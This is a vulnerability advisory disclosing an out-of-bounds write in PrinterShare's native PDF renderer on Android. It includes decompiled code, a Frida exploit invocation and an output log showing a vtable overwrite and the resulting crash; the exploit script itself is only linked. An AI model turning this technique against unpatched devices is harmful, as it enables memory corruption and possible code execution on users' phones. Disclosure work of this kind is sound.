Mobile Dynamix PrinterShare Mobile Print Out-of-bounds Write

Vulnerability Description

An Out of Bounds Write occurs when the native library attempts PDF rendering, which can be exploited to achieve memory corruption and potentially arbitrary code execution.

Technical Description

• Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite)
• Using Frida client on Ubuntu 24.04 LTS - Frida server on Samsung Rooted Device.
• Playstore location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US
• The target Activity is exported true. Which means any application may interact with it, given that permissions are provided.

The ActivityPrintDocuments class processes PDF files through JNI calls to native libraries. The vulnerability exists in the native component (libpdfrender.so) that handles PDF rendering and can be triggered when processing PDF files with manipulated dimensions and structure.

The vulnerability is accessible through the ActivityPrintDocuments class, which is launched when opening a PDF file:

  // From activityprintdocuments.java
  class j extends h {
      @Override
      public void a(Canvas canvas, boolean z2) {
          // ...
          int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap);
          // ...
      }
  }

The PDF rendering happens in class j (subclass of h), which calls the vulnerable native function:

  // From activityprintdocuments.java
  class j extends h {
      @Override
      public void a(Canvas canvas, boolean z2) {
          // ...
          int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap);
          // ...
      }
  }

The shared object function performs memory operations without proper validation, allowing attackers to manipulate memory via crafted inputs.

  undefined8 entry(long base_addr, int flag, char option) {
    // ...
    temp_long = *(long *)(base_addr + 0x90);
    *(undefined4 *)(temp_long + 0x18) = 0;
    // ... [Insufficient bounds checking on pointers]
    *(undefined8 *)(temp_long + 0x28) = 0;
    *(undefined8 *)(temp_long + 0x20) = 0;
    *(ulong *)(temp_long + 0x10) = temp_ulong;
    // ...
  }

The Frida script hooks critical native functions in libpdfrender.so, particularly targeting Java_com_dynamixsoftware_printershare_PDFrender_drawPage. It creates a malformed PDF with extreme dimensions (values of 0x7FFFFFFF or INT_MAX) designed to trigger buffer overflows. When the drawPage native function is called with corrupted parameters; it leads to memory corruption.

  $ frida -U -f com.dynamixsoftware.printershare -l exploit.js
   ____
      / _  |   Frida 16.6.5 - A world-class dynamic instrumentation toolkit
     | (_| |
      > _  |   Commands:
     /_/ |_|       help      -> Displays the help system
     . . . .       object?   -> Display information about 'object'
     . . . .       exit/quit -> Exit
     . . . .
     . . . .   More info at https://frida.re/docs/home/
     . . . .
     . . . .   Connected to SM T220 (id=R83X10JATAV)
  Spawning `com.dynamixsoftware.printershare`...
  Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
  [SM T220::com.dynamixsoftware.printershare ]-> [!] Terminal exploitation initialized
  [!] Initiating terminal exploit sequence
  [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
  [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$h.a
  [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$j.a
  [!] Creating terminal exploit PDF
  [+] Using existing exploit PDF
  [!] Launching with payload at /sdcard/Download/terminal_exploit.pdf
  [!] Called com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
  [+] Found libpdfrender.so at 0x75521e4000
  [!] Found critical function pointer: 0x75521e4e98
  ...SNIP...

  [!] Target function called
  [*] Original pageNum: 0x76b5496bc0
  [-] Error modifying dimensions: Error: access violation accessing 0x0
  [*] Flags changed: 0 -> 2065
  [!] Called critical function: 0xb4000075790586a0
  [*] Potential vtable: 0xb4000075790586a0 -> 0x762801f5a0
  [!] Overwrote potential vtable with "AAAAAAAA"
  [!] MEMORY MODIFIED at 0xb4000075790586a0 (vtable pointer):
  BEFORE:
  00000000  a0 f5 01 28 76 00 00 00                          ...(v...
  AFTER:
  00000000  00 40 41 41 41 41 41 41                          .@AAAAAA
  [!] Corrupted 64-byte memory chunk starting at object
  [!] MEMORY MODIFIED at 0xb4000075790586a0 (object memory):
  BEFORE:
  00000000  00 40 41 41 41 41 41 41 00 b8 e3 78 75 00 00 b4  .@AAAAAA...xu...
  00000010  80 03 e9 29 76 00 00 b4 00 00 00 00 00 00 00 00  ...)v...........
  00000020  80 00 00 00 fc ff ff ff 00 fe 3f d0 76 00 00 00  ..........?.v...
  00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  AFTER:
  00000000  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  00000010  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  00000020  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  00000030  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  [!] Target function returned: 0xffffffff
  [-] Post-function corruption error: Error: invalid operation
  Process crashed: Bad access due to invalid address

  ***
  *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
  Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
  Revision: '0'
  ABI: 'arm64'
  Processor: '4'
  Timestamp: 2025-03-03 09:31:59.556177436-0800
  Process uptime: 4s
  Cmdline: com.dynamixsoftware.printershare
  pid: 31838, tid: 32000, name: Thread-17  >>> com.dynamixsoftware.printershare <<<
  uid: 10243
  signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414000
      x0  b4000075790586a0  x1  0000000000000003  x2  0000000000000000  x3  0000000000000000
      x4  0000000000000000  x5  0000000000000000  x6  0000000000000000  x7  0000000000000000
      x8  0000000000004200  x9  0000007627bdd114  x10 0000007553d43d50  x11 0000007553d43cd0
      x12 0000000000000008  x13 00000076c4d36f78  x14 0000000000000010  x15 00000076d2300a00
      x16 000000761084cf48  x17 00000076cd911f30  x18 0000000000000000  x19 0000000000000003
      x20 b4000075790586a0  x21 4141414141414000  x22 000000760f393a40  x23 0000007553d47000
      x24 0000000000000010  x25 00000076d22fe840  x26 0000000000000002  x27 0000007553d43ed0
      x28 0000000000000010  x29 0000007553d43d40
      lr  000000760fb92440  sp  0000007553d43d00  pc  0000007627bdd168  pst 0000000060000000
 ...SNIP...

Mitigation and Remediation Recommendation

No response from vendor. There are no known mitigations to end-users of the affected application versions.

Credit

This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.

Proof of Concept

URL: https://www.korelogic.com/advisories/KL-001-2025-004.poc.js.txt

SHA256sum: 8f1df24eb0027d8bfc13092988839c5f8a3fb39a57912d338af719b23d253b2c

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy